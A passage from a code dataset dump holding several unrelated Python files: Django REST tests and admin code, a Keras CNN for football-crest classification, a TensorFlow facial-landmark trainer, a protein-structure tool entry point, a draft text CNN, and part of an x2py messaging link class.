CategoriesListCreateAPIViewTestCase(TestCase):\n\n def setUp(self):\n \"\"\"Define the test client and other test variables.\"\"\"\n self.cat1 = Categories.objects.create(name='Person')\n self.cat2 = Categories.objects.create(name='Food')\n\n def test_api_can_get_list_of_categories(self):\n \"\"\"Test the api can get list of categories.\"\"\"\n response = self.client.get(\n reverse('list-create-category'),\n content_type='application/json'\n )\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data), 2)\n\n cat1 = response.data[1]\n cat2 = response.data[0]\n\n self.assertEqual(cat1['id'], self.cat1.id)\n self.assertEqual(cat2['id'], self.cat2.id)\n\n def test_api_can_create_a_category(self):\n \"\"\"Test the api can create a category.\"\"\"\n data = {'name': 'Place'}\n response = self.client.post(\n reverse('list-create-category'),\n data,\n content_type='application/json'\n )\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n obj = Categories.objects.get(id=response.data['id'])\n self.assertEqual(obj.name, 'Place')\n\n\nclass AuditLogListCreateAPIViewTestCase(TestCase):\n\n def setUp(self):\n \"\"\"Define the test client and other test variables.\"\"\"\n self.audit1 = AuditLog.objects.create(title='Test 1', action=\"created\")\n self.audit2 = AuditLog.objects.create(title='Test 2', action=\"updated\")\n\n def test_api_can_get_list_of_audit_logs(self):\n \"\"\"Test the api can get list of audit logs.\"\"\"\n response = self.client.get(\n reverse('list-audits'),\n content_type='application/json'\n )\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data), 2)\n\n audit1 = response.data[1]\n audit2 = response.data[0]\n\n self.assertEqual(audit1['id'], self.audit1.id)\n self.assertEqual(audit2['id'], self.audit2.id)\n","sub_path":"api/apps/favorite_things/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"18561553","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nBy John Kenny\nConvolutional Neural Nework Training model\n\n\"\"\"\n\n#import coremltools\n\n#import keras\n#import tensorflow\n\n\n#Building the CNN\n\n#importing Keras libs and packages\n\n\n\n\n\nfrom keras.preprocessing.image import ImageDataGenerator \nfrom keras.models import Sequential \nfrom keras.layers import Conv2D, MaxPooling2D \nfrom keras.layers import Activation, Dropout, Flatten, Dense \nfrom keras import backend as K \n\n\n\n\nbatch = 5\nsize = 250 \n\n#initialise the cnn\nclassifier = Sequential()\n\n#Convolution layer\n\n#32 feature dectors with dimentions 3*3\nclassifier.add(Conv2D(32, (3, 3), input_shape=(250, 250, 3))) \nclassifier.add(Activation('relu')) \n\n\n#pooling layer\n\n#used to reduce the size of the feature map- reducing num of nodes and complexity \nclassifier.add(MaxPooling2D(pool_size=(2, 2)))\n\n#add an extra con layer\n\nclassifier.add(Conv2D(32, (3, 3))) \nclassifier.add(Activation('relu')) \nclassifier.add(MaxPooling2D(pool_size=(2, 2)))\n\n#add an extra con layer\n\nclassifier.add(Conv2D(32, (3, 3))) \nclassifier.add(Activation('relu')) \nclassifier.add(MaxPooling2D(pool_size=(2, 2)))\n\n#add an extra con layer\n\nclassifier.add(Conv2D(32, (3, 3))) \nclassifier.add(Activation('relu')) \nclassifier.add(MaxPooling2D(pool_size=(2, 2)))\n\n#add an extra con layer\n\nclassifier.add(Conv2D(32, (3, 3))) \nclassifier.add(Activation('relu')) \nclassifier.add(MaxPooling2D(pool_size=(2, 2)))\n\n\n\n\n#flatten layer\n\n#puts all the feature maps in one single vector\nclassifier.add(Flatten())\n\n\n# full connection of layers\n\n#128 nodes\nclassifier.add(Dense(units = 1500, activation = \"relu\"))\n #only 2 (sigmoid) other wise sofmax is needed \nclassifier.add(Dense(units = 20, activation = \"softmax\"))\n\n\n#compiling the CNN\n\n#without binary outcome crossentropy is needed\nclassifier.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\n\n# adding images to cnn\n\n#image preprocessing\nfrom keras.preprocessing.image import ImageDataGenerator\n\n\n#image augmentation \n\ntrain_datagen = ImageDataGenerator(\n rescale=1./255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True)\n\ntest_datagen = ImageDataGenerator(rescale=1./255)\n\ntrain_generator = train_datagen.flow_from_directory(\n 'dataset/training_set',\n target_size=(size, size),\n batch_size=5,\n class_mode='categorical')\n\nvalidation_generator = test_datagen.flow_from_directory(\n 'dataset/test_set',\n target_size=(size, size),\n batch_size=5,\n class_mode='categorical')\n\nclassifier.fit_generator(train_generator,\n steps_per_epoch=3847, epochs=100, validation_steps=20)\n\n\n\n#save the model\n\nimport h5py\n\nclassifier.save(\"model.h5\")\n\nfrom Ipython.display import SVG\nfrom keras.utils.vis_utils import model_to_dot\nSVG(model_to_dot(classifier).create(prog=\"dot\", format =\"svg\"))\n\n#plot graph using model\n\nfrom keras.utils import plot_model\n\nplot_model(classifier, \"graph.png\")\n\n#export model to coreml\n\nimport coremltools\n\noutput_labels = [\"Arsenal\", \"Bournemouth\", \"Brighton\", \"Burnley\", \"Chelsea\", \"Crystal Palace\", \"Everton\",\n \"Huddersfield Town\", \"Liverpool\", \"Leicester City\", \"Manchester City\", \"Manchester United\", \n \"Newcastle United\", \"Southampton\", \"Tottenham Hotspur\", \"Stoke City\", \"Swansea City\", \n \"Watford\", \"West Bromwich Albion\", \"West Ham United\"]\n\nscale = 1/255.\n\ncoreml_gen = coremltools.converters.keras.convert(\"model.h5\",\n input_names = 'image',\n image_input_names='image',\n class_labels =output_labels,\n image_scale= scale)\ncoreml_gen.author = \"John Kenny\"\ncoreml_gen.license = 'MIT'\ncoreml_gen.input_description['image'] = 'Image of a football crest'\ncoreml_gen.output_description['output1'] = \"Predicted team\"\ncoreml_gen.save(\"crestIdenifer.mlmodel\")\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Python model/ConVnet/Cnnfinal.py","file_name":"Cnnfinal.py","file_ext":"py","file_size_in_byte":4037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"22187719","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.contrib.auth.models import User\nfrom django.utils.safestring import mark_safe\n\nfrom .models import Profile\n\n\n# admin.site.register(Profile)\n\nclass InlineProfileAdmin(admin.StackedInline):\n model = Profile\n can_delete = False\n fields = [\n 'user',\n ('avatar', 'avatar_image'),\n 'interests'\n ]\n readonly_fields = ['avatar_image']\n\n def avatar_image(self, obj):\n return mark_safe(\n ''.format(\n url=obj.avatar.url,\n width=200\n )\n )\n\n\nclass CustomUserAdmin(UserAdmin):\n inlines = (InlineProfileAdmin,)\n list_display = ['username', 'email', 'first_name', 'last_name', 'is_staff', 'avatar_image']\n fieldsets = (\n (None, {'fields': (('username', 'email'), 'password')}),\n ('Personal info', {'fields': (('first_name', 'last_name'),), }),\n ('Permissions', {\n 'fields': (('is_active', 'is_staff', 'is_superuser'), 'groups', 'user_permissions'),\n }),\n ('Important dates', {'fields': (('last_login', 'date_joined'),)}),\n )\n readonly_fields = ['last_login', 'date_joined']\n\n def avatar_image(self, obj):\n return mark_safe(\n ''.format(\n url=obj.profile.avatar.url,\n width=60\n )\n )\n\n avatar_image.short_description = 'Avatar'\n\n\nadmin.site.unregister(User)\nadmin.site.register(User, CustomUserAdmin)\n","sub_path":"accounts/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"57143564","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.utils import timezone\n\n\ndef initial_data(apps, schema_editor):\n Question = apps.get_model('ex_django_tastypie', 'Question')\n\n q = Question.objects.create(question_text=\"What's up?\", pub_date=timezone.now())\n q.choice_set.create(choice_text='Not much', votes=0)\n q.choice_set.create(choice_text='The sky', votes=0)\n q.choice_set.create(choice_text='Just hacking again', votes=0)\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ex_django_tastypie', '0001_initial'),\n ]\n\n operations = [\n migrations.RunPython(initial_data),\n ]\n","sub_path":"ex_django_tastypie/migrations/0002_data.py","file_name":"0002_data.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"154956049","text":"import os\nimport cv2 as cv\nimport numpy as np\nimport tensorflow as tf\nimport datetime\nfrom tensorflow.python.framework import graph_util\n\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\nlabel_lines = []\nimage_lines = []\n\n\ndef read_img(txt_name):\n label_lines = []\n image_lines = []\n txt_open = open(txt_name)\n txt_read = txt_open.read()\n txt_lines = txt_read.split('\\n')\n\n for line in txt_lines:\n xlabel = []\n if len(line)>3:\n line_list = line.split(' ')\n image_lines.append(cv.imread(line_list[0]))\n xlabel.append(line_list[1])\n xlabel.append(line_list[2])\n for x in range(14):\n xlabel.append(line_list[117 + 2 + x * 2])\n xlabel.append(line_list[117 + 2 + x * 2 + 1])\n label_lines.append(xlabel)\n # label_lines.append(line_list[1:])\n\n\n label_linesc=[[float(i) for i in xline] for xline in label_lines]\n ximage_lines=np.array(image_lines, dtype='float32')\n ximage_lines = ximage_lines/256\n\n xlabel_linesc=np.array(label_linesc, dtype='float32')\n return ximage_lines,xlabel_linesc\n\n\n\n\ndef draw_form(MAX_STEP):\n step = MAX_STEP / 10\n img_H = 1000\n img_W = 1200\n coordinate = np.zeros((img_H, img_W, 3), np.uint8)\n coordinate[:, :, :] = 255\n line_c = 8\n coordinate = cv.line(coordinate, (100, img_H - 100), (img_W, img_H - 100), (0, 0, 0), 2)\n coordinate = cv.line(coordinate, (100, 0), (100, img_H - 100), (0, 0, 0), 2)\n\n for i in range(11):\n coordinate = cv.line(coordinate, (i * 100 + 100, img_H - 100), (i * 100 + 100, 0), (0, 0, 0), 1)\n coordinate = cv.line(coordinate, (100, i * 100 + 100), (img_W, i * 100 + 100), (0, 0, 0), 1)\n if i > 0:\n cv.putText(coordinate, str(i * step), (i * 100 + 100 - 32, img_H - 100 + 50), cv.FONT_HERSHEY_SIMPLEX, 0.6,\n (0, 0, 0), 2)\n biaohao = '%.1f' % (1.0 - i * 0.1 - 0.2)\n if biaohao == '-0.0':\n cv.putText(coordinate, '0', (100 - 50, i * 100 + 100 + 10 + 30), cv.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 2)\n else:\n cv.putText(coordinate, biaohao, (100 - 50, i * 100 + 100 + 10), cv.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 2)\n\n return coordinate\n\ndef drow_spot(img,x,y,MAX_STEP):\n # for i in range(x.shape[0]):\n\n put_str='step:%d loss:%.5f'%(x,y)\n print(put_str)\n img[120:180,500:830,:]=255\n cv.putText(img, put_str,(500,150), cv.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0), 2)\n spot_x = int(x/MAX_STEP*1000+100)\n spot_y =int(900-y*1000)\n # print('画点位置:',spot_x,spot_y)\n cv.circle(img,(spot_x,spot_y),3,(0,0,255),-1)\n\n\n\n cv.imshow('LOSS',img)\n cv.waitKey(10)\n\n\ndef face_net(batch_size,height, width, n_classes,learning_rate):\n print(batch_size,height, width, n_classes,learning_rate)\n x = tf.placeholder(tf.float32, shape=[None, height, width, 3], name='input')\n y = tf.placeholder(tf.float32, shape=[None, n_classes], name='labels')\n\n def weight_variable(shape, name=\"weights\"):\n initial = tf.truncated_normal(shape, dtype=tf.float32, stddev=0.1)\n return tf.Variable(initial, name=name)\n\n def bias_variable(shape, name=\"biases\"):\n initial = tf.constant(0.1, dtype=tf.float32, shape=shape)\n return tf.Variable(initial, name=name)\n with tf.variable_scope('conv1') as scope:\n W1 = weight_variable([3, 3, 3, 32])\n b1 = bias_variable([32])\n conv = tf.nn.conv2d(x, W1, strides=[1, 1, 1, 1], padding=\"SAME\")\n pre_activation = tf.nn.bias_add(conv, b1)\n relu1 = tf.nn.relu(pre_activation, name=\"relu1\")\n\n with tf.variable_scope('conv2') as scope:\n W2 = weight_variable([3, 3, 32, 64])\n b2 = bias_variable([64])\n conv2 = tf.nn.conv2d(relu1, W2, strides=[1, 2, 2, 1], padding='SAME')\n relu2 = tf.nn.relu(tf.nn.bias_add(conv2, b2), name='relu2')\n\n\n with tf.variable_scope('conv3') as scope:\n W3 = weight_variable([3, 3, 64, 128])\n b3 = bias_variable([128])\n conv3 = tf.nn.conv2d(relu2, W3, strides=[1, 1, 1, 1], padding='SAME')\n relu3 = tf.nn.relu(tf.nn.bias_add(conv3, b3), name='relu3')\n\n with tf.variable_scope('conv4') as scope:\n W4 = weight_variable([3, 3, 128, 256])\n b4 = bias_variable([256])\n conv4 = tf.nn.conv2d(relu3, W4, strides=[1, 2, 2, 1], padding='SAME')\n relu4 = tf.nn.relu(tf.nn.bias_add(conv4, b4), name='relu4')\n\n\n with tf.variable_scope('conv5') as scope:\n W5 = weight_variable([3, 3, 256, 128])\n b5 = bias_variable([128])\n conv5 = tf.nn.conv2d(relu4, W5, strides=[1, 1, 1, 1], padding='SAME')\n relu5 = tf.nn.relu(tf.nn.bias_add(conv5, b5), name='relu5')\n\n\n # with tf.variable_scope('conv6') as scope:\n # W6 = weight_variable([3, 3, 512, 256])\n # b6 = bias_variable([256])\n # conv6 = tf.nn.conv2d(relu5, W6, strides=[1, 2, 2, 1], padding='SAME')\n # relu6 = tf.nn.relu(tf.nn.bias_add(conv6, b6), name='relu6')\n\n with tf.variable_scope('conv7') as scope:\n W7 = weight_variable([3, 3, 128, 256])\n b7= bias_variable([256])\n conv7 = tf.nn.conv2d(relu5, W7, strides=[1, 1, 1, 1], padding='SAME')\n relu7 = tf.nn.relu(tf.nn.bias_add(conv7, b7), name='relu7')\n\n\n\n # 全连接层\n with tf.variable_scope(\"fc1\") as scope:\n\n dim = int(np.prod(relu7.get_shape()[1:]))\n reshape = tf.reshape(relu7, [-1, dim])\n weights1 =weight_variable([dim, 256]) ##24*24*256*256\n biases1 = bias_variable([256])\n fc1 = tf.nn.dropout(tf.nn.relu(tf.matmul(reshape, weights1) + biases1, name=\"fc1\"),0.5)\n\n with tf.variable_scope(\"fc2\") as scope:\n weights122 =weight_variable([256, 1024])\n biases122 = bias_variable([1024])\n fc2 = tf.nn.dropout(tf.nn.relu(tf.matmul(fc1, weights122) + biases122, name=\"fc2\"),0.5)\n\n with tf.variable_scope(\"output\") as scope:\n weights2 = weight_variable([1024, n_classes])\n biases2 = bias_variable([n_classes])\n # y_conv = tf.sigmoid(tf.matmul(fc2, weights2)+biases2, name=\"output\")\n # y_conv = tf.sigmoid(tf.matmul(fc2, weights2)+biases2, name=\"output\")\n y_conv=tf.add(tf.matmul(fc2, weights2),biases2, name=\"output\")\n yy_conv =tf.add(y_conv,0,name='xoutput')\n # rmse = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=y_conv, labels=y))\n rmse = tf.sqrt(tf.reduce_mean(tf.square( y - y_conv)))\n\n with tf.name_scope(\"optimizer\"):\n optimize = tf.train.AdamOptimizer(learning_rate=learning_rate)\n global_step = tf.Variable(0, name=\"global_step\", trainable=False)\n train_op = optimize.minimize(rmse, global_step=global_step)\n print()\n return dict(\n x=x,\n y=y,\n weights2= [weights2,weights122],\n biases2=[biases2,biases122],\n y_conv=y_conv,\n optimize=train_op,\n cost=rmse,\n )\n\n\ndef run_training(txt_name):\n imgs = draw_form(MAX_STEP)\n logs_train_dir = './face72/face_0821/'\n X_data, Y_data = read_img(txt_name)\n graph= face_net(BATCH_SIZE, IMG_H,IMG_W, N_CLASSES,learning_rate)\n # summary_op = tf.summary.merge_all()\n sess = tf.Session()\n # train_writer = tf.summary.FileWriter(logs_train_dir, sess.graph)\n saver = tf.train.Saver()\n sess.run(tf.global_variables_initializer())\n ckpt = tf.train.get_checkpoint_state(logs_train_dir)\n y_step=0\n if ckpt and ckpt.model_checkpoint_path:\n global_step = ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1]\n saver.restore(sess, ckpt.model_checkpoint_path)\n print(global_step)\n y_step = int(float(global_step))\n\n loss_list ={}\n loss_list['x']=[]\n loss_list['y'] = []\n\n for step in np.arange(MAX_STEP):\n loss_avg=0.0\n for i in range(BATCH_SIZE):\n xb= (step%332)*32+i\n # ximage=np.array(X_data[xb]*255+127.5, dtype='uint8')\n # for xxi in range(72):\n # cv.circle(ximage,(int(Y_data[xb][2+2*xxi]*96),int(Y_data[xb][2+2*xxi+1]*96)),2,(0, 255, 255), -1)\n # cv.imshow('ximage',ximage)\n # cv.waitKey()\n # print(xb)\n _, tra_loss, weights2, biases2 = sess.run([graph['optimize'],graph['cost'],graph['weights2'],graph['biases2']],feed_dict={\n graph['x']: np.reshape(X_data[xb], (1, 96, 96, 3)),\n graph['y']: np.reshape(Y_data[xb], (1, 30))})\n loss_avg+=tra_loss\n\n avg_loss =loss_avg/BATCH_SIZE\n\n loss_list['x'].append(step+y_step)\n loss_list['y'].append(avg_loss)\n\n drow_spot(imgs,step, avg_loss, MAX_STEP)\n\n\n print('次数:',step,'对应loss:',avg_loss)\n\n # = sess.run(, feed_dict={\n # graph['x']: np.reshape(X_data[xb], (1, 96, 96, 3)),\n # graph['y']: np.reshape(Y_data[xb], (1, 30))})\n\n if step % 50 == 0:\n print('Step %d,train loss = %.5f' % (step+y_step, avg_loss))\n constant_graph = graph_util.convert_variables_to_constants(sess, sess.graph_def,\n ['xoutput'])\n with tf.gfile.FastGFile(logs_train_dir + 'facex.pb', mode='wb') as f:\n f.write(constant_graph.SerializeToString())\n\n\n # 每迭代50次,打印出一次结果\n # summary_str = sess.run(summary_op)\n # train_writer.add_summary(summary_str, step)\n if step % 200 == 0 or (step + 1) == MAX_STEP:\n checkpoint_path = os.path.join(logs_train_dir, 'model.ckpt')\n saver.save(sess, checkpoint_path, global_step=step+y_step)\n # 每迭代200次,利用saver.save()保存一次模型文件,以便测试的时候使用\n sess.close()\n\n\n\ntxt_name= 'trains.txt'\nIMG_W = 96\nIMG_H = 96\n\nBATCH_SIZE = 32\nCAPACITY = 32\nMAX_STEP = 4000\nlearning_rate = 0.0001\nN_CLASSES = 30\nrun_training(txt_name)\n\n\n\n\ndef get_one_image(img_dir):\n image = cv.imread(img_dir)\n # 好像一次只能打开一张图片,不能一次打开一个文件夹,这里大家可以去搜索一下\n bei_x = 96 / int(image.shape[1])\n bei_y = 96 / int(image.shape[0])\n min_bian = min(image.shape[0], image.shape[1])\n max_bian = max(image.shape[0], image.shape[1])\n # bei_x = 48 / max_bian\n # print(12346)\n # if image.shape[0] == min_bian:\n # cha = int((image.shape[1] - min_bian) / 2)\n # images = np.zeros((image.shape[1], image.shape[1], 3), np.uint8)\n # images[cha:cha + min_bian, :, :] = image\n # image = cv.resize(images, None, fx=bei_x, fy=bei_x, interpolation=cv.INTER_CUBIC)\n # else:\n # cha = int((image.shape[0] - min_bian) / 2)\n # images = np.zeros((image.shape[0], image.shape[0], 3), np.uint8)\n # images[:, cha:cha + min_bian, :] = image\n # image = cv.resize(images, None, fx=bei_x, fy=bei_x, interpolation=cv.INTER_CUBIC)\n image = cv.resize(image, None, fx=bei_x, fy=bei_y, interpolation=cv.INTER_CUBIC)\n image_arr = np.array(image)\n\n return image_arr\n\n\ndef val(test_file):\n log_dir = './face72/face_0807/'\n # image_arr=test_file\n image_arr = get_one_image(test_file)\n with tf.Graph().as_default():\n image =image_arr/256\n # image = tf.cast(image_arr, tf.float32)\n # image = tf.image.per_image_standardization(image) ###归一化操作\n # image = tf.reshape(image, [1, 96, 96, 3])\n op_intp = np.zeros(N_CLASSES, np.float32)\n\n # batch_size,height, width, n_classes,learning_rate\n graph= face_net(1,96, 96, 30,learning_rate)\n # print('看看p的值:',p)\n # logits = graph['cost'] # tf.nn.softmax(p)\n # x = tf.placeholder(tf.float32, shape=[1,96, 96, 3])\n saver = tf.train.Saver()\n with tf.Session() as sess:\n ckpt = tf.train.get_checkpoint_state(log_dir)\n print('看看值',ckpt.model_checkpoint_path)\n if ckpt and ckpt.model_checkpoint_path:\n global_step = ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1]\n saver.restore(sess, ckpt.model_checkpoint_path)\n # 调用saver.restore()函数,加载训练好的网络模型\n # print('Loading success')\n else:\n print('没有保存的模型')\n prediction = sess.run(graph['y_conv'] , feed_dict={graph['x']: np.reshape(image, (1, 96, 96, 3)),graph['y']:np.reshape(op_intp, (1, 30))})\n return prediction\n\nfile_path = '../face68/image_test'\n# file_path ='E:/face68/trainb'\n# file_path ='E:/face into'\n# file_path ='E:/face72/trainb'\n# file_path ='E:/face68/trainb'\nfor file in os.listdir(file_path):\n img_path = file_path + '/' + file\n img = cv.imread(img_path)\n start_time = datetime.datetime.now()\n prediction = val(img_path)\n print('耗时:',datetime.datetime.now()-start_time)\n img = cv.resize(img, (480, 480), interpolation=cv.INTER_CUBIC)\n print( prediction[0][0:2])\n\n biaoq ='None'\n if prediction[0][0]>= 0.8 and prediction[0][0]<1.6:\n biaoq = 'Smile'\n elif prediction[0][0]>=1.6:\n biaoq = 'Laugh'\n biaoq+=':' + str(prediction[0][1])\n img = cv.putText(img, biaoq, (0, 30), 2, cv.FONT_HERSHEY_PLAIN, (255, 0, 0))\n for i in range(int(len(prediction[0]) / 2)-1):\n cv.circle(img, (int(prediction[0][2+i * 2] * img.shape[1]), int(prediction[0][2+i * 2 + 1] * img.shape[0])), 2,\n (0, 255, 255), -1)\n\n cv.imshow('img', img)\n cv.waitKey()\n cv.destroyAllWindows()","sub_path":"face_into/face72/face_pb.py","file_name":"face_pb.py","file_ext":"py","file_size_in_byte":13539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"280996949","text":"from peddit.parser import parse_arguments\nfrom peddit.peddit import Peditor\nfrom peddit.plotter import plotter\n\nimport matplotlib.pyplot as plt\n\n\ndef main(): \n print(\"Initiating Peddit tool.\")\n args = parse_arguments() \n\n c = Peditor(args)\n c.struct_retrieve()\n c.replace_ent_to_pdb_name()\n\n a = c.editor()\n c.edited_pdb_writer(args, a)\n print(\"\\nPDB file written.\")\n\n\n print(f\"Calculating bonds for {args.id_input}.pdb...\")\n c.calculate_interaction(f\"{args.id_input}_bonds.csv\")\n print(\"Writing bonds interaction file: done\")\n\n\n print(\"\\nPlotting the data...\")\n plotter(f\"{args.output_path}/{args.id_input}_bonds.csv\")\n plt.show()\n\n\nif __name__ == '__main__': \n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"123988735","text":"\"\"\"\r\nimplementation of CNN model to oprate on texts\r\n\"\"\"\r\n\r\nimport tensorflow as tf\r\nimport math\r\n\r\nclass CNN:\r\n \"\"\"\r\n a CNN model to get representations of tokens\r\n --input: sentences, aka. sequences of words\r\n --embedding layer\r\n --multi conv layer\r\n --pooling\r\n --full connection\r\n --manually drop-out\r\n --negative-sampling\r\n \"\"\"\r\n\r\n def __init__(self, sentence_length, vocab_size, embedding_size, filter_sizes, num_filters, num_labels=1, l2_reg_lambda=0.0):\r\n \"\"\"\r\n init the class\r\n :param sentence_length: sentence length\r\n :param vocab_size: how many different words\r\n :param embedding_size: 200, 100 for structure ; 100 for natural language\r\n :param filter_sizes: n-grams\r\n :param num_filters: number of conv filters\r\n :param l2_reg_lambda: 0.0 means no l2 regulation\r\n \"\"\"\r\n\r\n # configure word2vec parameters\r\n self.num_sampled = 64\r\n\r\n\r\n # input, output, dropout\r\n self.batch = tf.placeholder(tf.int32, [None, sentence_length], name='batch') # place holder for word ids\r\n self.labels = tf.placeholder(tf.float32, [None, num_labels], name='label')\r\n self.dropout_keep_prob = tf.placeholder(tf.float32, name='dropout_keep_prob') # value should be in [0, 1]\r\n\r\n # l2 regulation loss (optional)\r\n l2_loss = tf.constant(l2_reg_lambda)\r\n\r\n # embedding layer\r\n with tf.device('/cpu:0'), tf.name_scope('embedding'):\r\n self.W = tf.Variable(tf.random_uniform([vocab_size, embedding_size], -1.0, 1.0), name='W')\r\n\r\n # result tensor: [None, sentence_length, embedding_size]\r\n self.embedded_words = tf.nn.embedding_lookup(self.W, self.batch)\r\n\r\n # since conv2d operation expects 4-dimensional tensor which are batch, width, height, channel respectively\r\n # we expand the embedding with chanel=1\r\n self.embedded_words_expanded = tf.expand_dims(self.embedded_words, -1)\r\n\r\n # Create a convolution + maxpool layer for each filter size\r\n pooled_outputs = []\r\n for i, filter_size in enumerate(filter_sizes):\r\n with tf.name_scope(\"conv-maxpool-%s\" % filter_size):\r\n # Convolution Layer\r\n filter_shape = [filter_size, embedding_size, 1, num_filters]\r\n W = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name=\"W\")\r\n b = tf.Variable(tf.constant(0.1, shape=[num_filters]), name=\"b\")\r\n conv = tf.nn.conv2d(\r\n self.embedded_chars_expanded,\r\n W,\r\n strides=[1, 1, 1, 1],\r\n padding=\"VALID\",\r\n name=\"conv\")\r\n # Apply nonlinearity\r\n h = tf.nn.relu(tf.nn.bias_add(conv, b), name=\"relu\")\r\n # Maxpooling over the outputs\r\n pooled = tf.nn.max_pool(\r\n h,\r\n ksize=[1, sentence_length - filter_size + 1, 1, 1],\r\n strides=[1, 1, 1, 1],\r\n padding='VALID',\r\n name=\"pool\")\r\n pooled_outputs.append(pooled)\r\n\r\n # Combine all the pooled features\r\n num_filters_total = num_filters * len(filter_sizes)\r\n self.h_pool = tf.concat(pooled_outputs, 3)\r\n self.h_pool_flat = tf.reshape(self.h_pool, [-1, num_filters_total])\r\n\r\n # Add dropout\r\n with tf.name_scope(\"dropout\"):\r\n self.h_drop = tf.nn.dropout(self.h_pool_flat, self.dropout_keep_prob)\r\n\r\n # constructs variables for nce loss estimate\r\n with tf.name_scope('weights'):\r\n nce_weights = tf.Variable(\r\n tf.truncated_normal([vocab_size, embedding_size],\r\n stddev=1.0 / math.sqrt(embedding_size)))\r\n with tf.name_scope('biases'):\r\n nce_biases = tf.Variable(tf.zeros([vocab_size]))\r\n\r\n #\r\n with tf.name_scope('loss'):\r\n loss = tf.reduce_mean(\r\n tf.nn.nce_loss(\r\n weights=nce_weights,\r\n biases=nce_biases,\r\n labels=self.labels,\r\n inputs=self.h_pool_flat,\r\n num_sampled=self.num_sampled,\r\n num_classes=vocab_size))\r\n\r\n def train(self):\r\n with tf.Graph().as_default():\r\n session_conf = tf.ConfigProto(\r\n\r\n )\r\n\r\n","sub_path":"deep_netwokrs/text_CNN.py","file_name":"text_CNN.py","file_ext":"py","file_size_in_byte":4660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"181649835","text":"# Copyright (c) 2017, 2018 Jae-jun Kang\n# See the file LICENSE for details.\n\nfrom x2py.event_factory import EventFactory\nfrom x2py.hub import Hub\nfrom x2py.link import Link\nfrom x2py.util.ranged_int_pool import RangedIntPool\nfrom x2py.util.rwlock import ReadLock, WriteLock, ReadWriteLock\nfrom x2py.util.trace import Trace\n\nfrom x2py.links.link_events import *\n\ndef _static_init():\n EventFactory.register(LinkEventType.HANDSHAKE_REQ, HandshakeReq)\n EventFactory.register(LinkEventType.HANDSHAKE_RESP, HandshakeResp)\n EventFactory.register(LinkEventType.HANDSHAKE_ACK, HandshakeAck)\n\n return RangedIntPool(1, 65536, True)\n\nclass SessionBasedLink(Link):\n handle_pool = _static_init()\n\n def __init__(self, name):\n super(SessionBasedLink, self).__init__(name)\n self.rwlock = ReadWriteLock()\n self.channel_strategy = None\n self.heartbeat_strategy = None\n\n @property\n def has_channel_strategy(self):\n return (self.channel_strategy is not None)\n\n @property\n def has_heartbeat_strategy(self):\n return (self.heartbeat_strategy is not None)\n\n def init_session(self, session):\n if self.has_channel_strategy:\n self.channel_strategy.before_session_setup(session)\n if self.has_heartbeat_strategy:\n self.heartbeat_strategy.before_session_setup(session)\n\n if self.has_channel_strategy:\n self.channel_strategy.init_handshake(session)\n else:\n self.on_connect(True, session)\n\n\n def on_connect(self, result, context):\n Trace.info(\"{} connected {} {}\", self.name, result, context)\n\n if result:\n handle = SessionBasedLink.handle_pool.acquire()\n context.handle = handle\n\n self._on_connect(result, context)\n\n LinkSessionConnected().setattrs(\n link_name = self.name,\n result = result,\n context = context\n ).post()\n\n def on_disconnect(self, handle, context):\n Trace.info(\"{} disconnected {} {}\", self.name, handle, context)\n\n self._on_disconnect(handle, context)\n\n if handle != 0:\n SessionBasedLink.handle_pool.release(handle)\n\n LinkSessionDisconnected().setattrs(\n link_name = self.name,\n handle = handle,\n context = context\n ).post()\n\n def _on_connect(self, result, context):\n pass\n\n def _on_disconnect(self, handle, context):\n pass\n\n def _setup(self):\n super(SessionBasedLink, self)._setup()\n\n self.bind(LinkSessionConnected().setattrs(link_name = self.name),\n self.on_link_session_connected)\n self.bind(LinkSessionDisconnected().setattrs(link_name = self.name),\n self.on_link_session_disconnected)\n\n if self.has_channel_strategy:\n self.channel_strategy.link = self\n self.channel_strategy.setup()\n\n if self.has_heartbeat_strategy:\n self.heartbeat_strategy.link = self\n self.heartbeat_strategy.setup()\n\n self.bind(Hub.heartbeat_event, self.on_heartbeat_event)\n\n def _teardown(self):\n if self.has_heartbeat_strategy:\n self.heartbeat_strategy.teardown()\n self.heartbeat_strategy = None\n if self.has_channel_strategy:\n self.channel_strategy.teardown()\n self.channel_strategy = None\n\n self.unbind(LinkSessionConnected().setattrs(link_name = self.name),\n self.on_link_session_connected)\n self.unbind(LinkSessionDisconnected().setattrs(link_name = self.name),\n self.on_link_session_disconnected)\n\n 